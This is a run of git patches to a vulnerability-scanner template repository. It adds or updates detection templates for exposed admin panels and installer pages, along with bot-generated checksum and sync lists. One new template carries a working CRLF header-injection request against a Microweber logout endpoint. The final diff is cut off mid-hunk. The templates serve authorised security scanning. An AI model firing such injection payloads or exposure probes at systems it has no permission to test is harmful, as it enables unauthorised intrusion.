'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/misconfiguration/installer/wowonder-installer.yaml' + - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 7f98daf143f0640475d71279f688a422ce4e9a61 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 06:28:02 +0000 Subject: [PATCH 1591/1768] Auto Template Signing [Fri May 31 06:28:02 UTC 2024] :robot: --- http/technologies/gabia-server-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/gabia-server-detect.yaml b/http/technologies/gabia-server-detect.yaml index e6249d5acf..07f9d814d4 100644 --- a/http/technologies/gabia-server-detect.yaml +++ b/http/technologies/gabia-server-detect.yaml @@ -33,3 +33,4 @@ http: part: header kval: - Server +# digest: 4a0a0047304502205ccf8e2d235f6cbcea261c0248b1337d4a7d4ac81edb302e970c5d290598cb0a022100c3883de05ee2d9ecf2578f402eff9e5e68ba731f3a05b8f71d4df2db48082369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9075f2bebecc6a3037eaf92e4ab7307feaba31cd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 13:21:41 +0530 Subject: [PATCH 1592/1768] fix FN --- http/exposed-panels/oracle-access-management.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index eb34017120..44724ad052 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -10,16 +10,22 @@ info: classification: cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 shodan-query: http.title:"Oracle Access Management" + fofa-query: title="Oracle Access Management" vendor: oracle - verified: true tags: panel,oracle,login,detect http: - method: GET path: - "{{BaseURL}}/oam/pages/login.jsp" + - "{{BaseURL}}" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: @@ -27,13 +33,10 @@ http: part: body words: - "Login - Oracle Access Management" - - "/oam/server/auth_cred_submit" + - "/oam/pages/images" + - "/oam/server/" condition: or - - type: status - status: - - 200 - extractors: - type: regex part: body From 4ec97d75ccb96c1ef84ad79a4df70ad2dcad9fa8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 31 May 2024 08:19:42 +0000 Subject: [PATCH 1593/1768] Auto Generated New Template Addition List [Fri May 31 08:19:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 814ab10113..cbe2ef685c 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml +http/exposed-panels/oracle-access-management.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml From 58feab31a5911faf865b05b0f38de0f25067c3bc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 31 May 2024 08:19:48 +0000 Subject: [PATCH 1594/1768] Auto Generated Templates Checksum [Fri May 31 08:19:48 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f406b243d4..6a73e6a5d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4194,6 +4194,7 @@ http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 +http/exposed-panels/oracle-access-management.yaml:e15edb1391bc0c2b106f0f9ea60a307738e7db1d http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 @@ -6784,7 +6785,7 @@ http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 -http/technologies/gabia-server-detect.yaml:b3f9672dec2b27086d25ec314cfa48d4e6f031b0 +http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 http/technologies/getsimple-cms-detect.yaml:aa37fcd2cac2e03df123bddcf0cf441500318c41 @@ -8609,7 +8610,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3c6cc3a0faf81fef12e954fa33a42c3c2ef54b42 +templates-checksum.txt:3cb8f160b0577067090d4a32939267a8fc3d7441 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a733fcb37a126f87b9e6ca4dc3e67638af545cd7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 31 May 2024 08:20:35 +0000 Subject: [PATCH 1595/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2adbb5ff36..5faa2150c9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' + - 'http/exposed-panels/oracle-access-management.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' From 24ceac824814532bac91bf358addf30fb0e67157 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 31 May 2024 08:21:34 +0000 Subject: [PATCH 1596/1768] Auto Template Signing [Fri May 31 08:21:34 UTC 2024] :robot: --- http/exposed-panels/oracle-access-management.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index 44724ad052..93c67194c6 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -43,3 +43,4 @@ http: group: 1 regex: - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' +# digest: 4b0a004830460221009b987e6950baed2c73f6a75be4134b254ee9bb5ff7f8603ee78871321ece224502210098f853289aa93ef588824ac480ad72a1019227b6acb2476c6ea638889ac64609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 92e23ba736622ee36fc6afda5fc8b540e5a84131 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 14:01:21 +0530 Subject: [PATCH 1597/1768] Create CVE-2022-0666.yaml --- http/cves/2022/CVE-2022-0666.yaml | 36 +++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2022/CVE-2022-0666.yaml diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml new file mode 100644 index 0000000000..9c53b2277a --- /dev/null +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-0666 + +info: + name: Microweber < 1.2.11 - CRLF Injection + author: ritikchaddha + severity: high + description: | + CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11. + reference: + - https://github.com/microweber/microweber/commit/f0e338f1b7dc5ec9d99231f4ed3fa6245a5eb128 + - https://huntr.dev/bounties/7215afc7-9133-4749-8e8e-0569317dbd55 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0666 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0666 + cwe-id: CWE-93 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,huntr,crlf,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;" + + matchers: + - type: regex + part: header + regex: + - "^Set-Cookie: crlfinjection=1;" From b474e451614bf4a7d4e993d47483167862f9b44f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 31 May 2024 16:15:44 +0700 Subject: [PATCH 1598/1768] Rename http/misconfiguration/cubebackup-setup-installer.yaml to http/misconfiguration/installer/cubebackup-setup-installer.yaml --- .../{ => installer}/cubebackup-setup-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/misconfiguration/{ => installer}/cubebackup-setup-installer.yaml (99%) diff --git a/http/misconfiguration/cubebackup-setup-installer.yaml b/http/misconfiguration/installer/cubebackup-setup-installer.yaml similarity index 99% rename from http/misconfiguration/cubebackup-setup-installer.yaml rename to http/misconfiguration/installer/cubebackup-setup-installer.yaml index 2850b0a3b4..2e0eae7090 100644 --- a/http/misconfiguration/cubebackup-setup-installer.yaml +++ b/http/misconfiguration/installer/cubebackup-setup-installer.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220128cfc82d3dff26aed49cee5aa69ca7428cd65495bf2a70cc8d405825af8f976022100bcc76a3c09d698786cd3f8071a590aa9c8b11291474ffc8fb9adf142af9a8929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220128cfc82d3dff26aed49cee5aa69ca7428cd65495bf2a70cc8d405825af8f976022100bcc76a3c09d698786cd3f8071a590aa9c8b11291474ffc8fb9adf142af9a8929:922c64590222798bb761d5b6d8e72950 From ee9bb09d531838e13958f7ef3db3740c73db96a4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 11:49:15 +0000 Subject: [PATCH 1599/1768] Auto Generated New Template Addition List [Fri May 31 11:49:15 UTC 2024] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index cbe2ef685c..b100cf5ad9 100644 --- a/.new-additions +++ b/.new-additions @@ -20,10 +20,10 @@ http/exposed-panels/oracle-access-management.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml -http/misconfiguration/cubebackup-setup-installer.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml +http/misconfiguration/installer/cubebackup-setup-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml From d6c16f52b7bf433eefa3b382e146418fae6a76ea Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 11:49:20 +0000 Subject: [PATCH 1600/1768] Auto Generated Templates Checksum [Fri May 31 11:49:20 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6a73e6a5d5..9992836bb0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4194,7 +4194,7 @@ http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 -http/exposed-panels/oracle-access-management.yaml:e15edb1391bc0c2b106f0f9ea60a307738e7db1d +http/exposed-panels/oracle-access-management.yaml:4891f0dc43e639073cfad415a15f31fba0274ea5 http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 @@ -5313,7 +5313,6 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 -http/misconfiguration/cubebackup-setup-installer.yaml:1e8262b8451a65083cc49135bb49f64bd33f5cf3 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5425,6 +5424,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 +http/misconfiguration/installer/cubebackup-setup-installer.yaml:560b0b2093f714f2389df69677c82f956f848123 http/misconfiguration/installer/custom-xoops-installer.yaml:ee8a3bf092cb7c1efd90f278a5ad74e2f4442510 http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 @@ -8610,7 +8610,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3cb8f160b0577067090d4a32939267a8fc3d7441 +templates-checksum.txt:833cb684623c878f0adebde0ed7d4c39b1a44e48 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d644c46f36cb6a718d506939f58050ecf95f3c34 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 11:50:02 +0000 Subject: [PATCH 1601/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5faa2150c9..78ddeba7bb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,10 +25,10 @@ on: - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' - - 'http/misconfiguration/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' + - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' From 986339f584f6a6f161c4da3170b0cebca4c873b8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 17:53:31 +0530 Subject: [PATCH 1602/1768] minor update --- http/technologies/sparklighter-detect.yaml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 879326d922..95913d9fe2 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -4,24 +4,32 @@ info: name: Spark Lighter Detection author: icarot severity: info - description: This nuclei template detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. + description: | + Detects a Spark Lighter server, a REST API for Apache Spark on K8S or YARN. classification: cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: - max-request: 5 - vendor: lighter - product: spark_lighter_server + verified: true + max-request: 1 + vendor: apache + product: spark category: productivity tags: tech,lighter,spark,detect -requests: +http: - method: GET path: - "{{BaseURL}}/lighter/api" - - "{{BaseURL}}/lighter/batches" - - "{{BaseURL}}/lighter/sessions" + matchers-condition: and matchers: + - type: word + part: body + words: + - 'Lighter' + - '/lighter/favicon.svg' + condition: and + - type: status status: - 200 From c2b6ea9a5812d9533e7027d0e4530b246d09e9a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 20:03:51 +0530 Subject: [PATCH 1603/1768] Create orchard-installer.yaml --- .../installer/orchard-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/orchard-installer.yaml diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml new file mode 100644 index 0000000000..82c5c0e464 --- /dev/null +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -0,0 +1,34 @@ +id: orchard-installer + +info: + name: Orchard Setup Wizard - Exposure + author: DhiyaneshDK + severity: high + description: | + Orchard is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Orchard Setup - Get Started" + tags: misconfig,exposure,install,orchard + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Orchard Setup - Get Started" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 17a131d3a7150dd17a6f37c4690affbc03114146 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 20:14:35 +0530 Subject: [PATCH 1604/1768] Create confluence-installer.yaml --- .../installer/confluence-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/confluence-installer.yaml diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml new file mode 100644 index 0000000000..ae0049f8ab --- /dev/null +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -0,0 +1,34 @@ +id: confluence-installer + +info: + name: Confluence Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Confluence is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Choose your deployment type - Confluence" + tags: misconfig,exposure,install,confluence + +http: + - method: GET + path: + - "{{BaseURL}}/setup/setupcluster-start.action" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Choose your deployment type - Confluence" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 758e1687c627e70fea1859ce5b3d526001fec6eb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 22:01:36 +0530 Subject: [PATCH 1605/1768] Update confluence-installer.yaml --- http/misconfiguration/installer/confluence-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml index ae0049f8ab..a994a54642 100644 --- a/http/misconfiguration/installer/confluence-installer.yaml +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -24,11 +24,6 @@ http: words: - "Choose your deployment type - Confluence" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 3884371be5c00deb99e3442e7c99e16f2883ad9c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 22:02:24 +0530 Subject: [PATCH 1606/1768] Update orchard-installer.yaml --- http/misconfiguration/installer/orchard-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index 82c5c0e464..0022be5016 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -24,11 +24,6 @@ http: words: - "Orchard Setup - Get Started" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 7bd6dfa0f1b70d934f20d87db6d75db39badb6b6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:34:30 +0000 Subject: [PATCH 1607/1768] Auto Generated New Template Addition List [Fri May 31 16:34:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b100cf5ad9..ca7a4539fa 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/iot/netgear-boarddataww-rce.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml +http/misconfiguration/installer/confluence-installer.yaml http/misconfiguration/installer/cubebackup-setup-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml From 3ef452ef898ddfc4c5336e5743208e0c11578c33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 16:34:34 +0000 Subject: [PATCH 1608/1768] Auto Generated Templates Checksum [Fri May 31 16:34:34 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9992836bb0..3c09b2b6e4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5421,6 +5421,7 @@ http/misconfiguration/installer/cms-made-simple-installer.yaml:bd77905eec6dd6463 http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 +http/misconfiguration/installer/confluence-installer.yaml:bae5eaa3593f1211cd203229f56f1f55f0d9d044 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 @@ -8610,7 +8611,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:833cb684623c878f0adebde0ed7d4c39b1a44e48 +templates-checksum.txt:c92791826e25e6bb4d0934460ab64d4078eb8fe5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5b0d21482f581bf27991742eafe68f9b3b886dc6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:35:14 +0000 Subject: [PATCH 1609/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 78ddeba7bb..ff96318147 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' + - 'http/misconfiguration/installer/confluence-installer.yaml' - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' From 05863ecdbac662d036e391b9bedf8f3d232afbc2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:35:18 +0000 Subject: [PATCH 1610/1768] Auto Generated New Template Addition List [Fri May 31 16:35:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ca7a4539fa..c290ee6664 100644 --- a/.new-additions +++ b/.new-additions @@ -37,6 +37,7 @@ http/misconfiguration/installer/librenms-installer.yaml http/misconfiguration/installer/mura-cms-setup-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/orchard-installer.yaml http/misconfiguration/installer/pandora-fms-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml From f40c7fc8605e1338edb0889c841906a73bb2a07d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 16:35:58 +0000 Subject: [PATCH 1611/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ff96318147..df3c596f3e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -42,6 +42,7 @@ on: - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/orchard-installer.yaml' - 'http/misconfiguration/installer/pandora-fms-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' From f380070c3f23f9d0548c30379a3b4cdd96239a01 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 16:36:23 +0000 Subject: [PATCH 1612/1768] Auto Template Signing [Fri May 31 16:36:23 UTC 2024] :robot: --- http/misconfiguration/installer/confluence-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml index a994a54642..99fb95b541 100644 --- a/http/misconfiguration/installer/confluence-installer.yaml +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207edd0df973d23b38b3f4fff8520842ab5422e818a3f7c1d14158099a31b4d52c022052c40e94c34255ea723f552adc84040331acb8af45ba05207e24b487c9b3722b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 95dc53c1279795021021d41851e297a5aec52a70 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 22:36:15 +0530 Subject: [PATCH 1613/1768] Fix FP open-redirect-generic.yaml --- http/vulnerabilities/generic/open-redirect-generic.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index a0b0cc557c..f7efaed7db 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -47,7 +47,7 @@ http: - 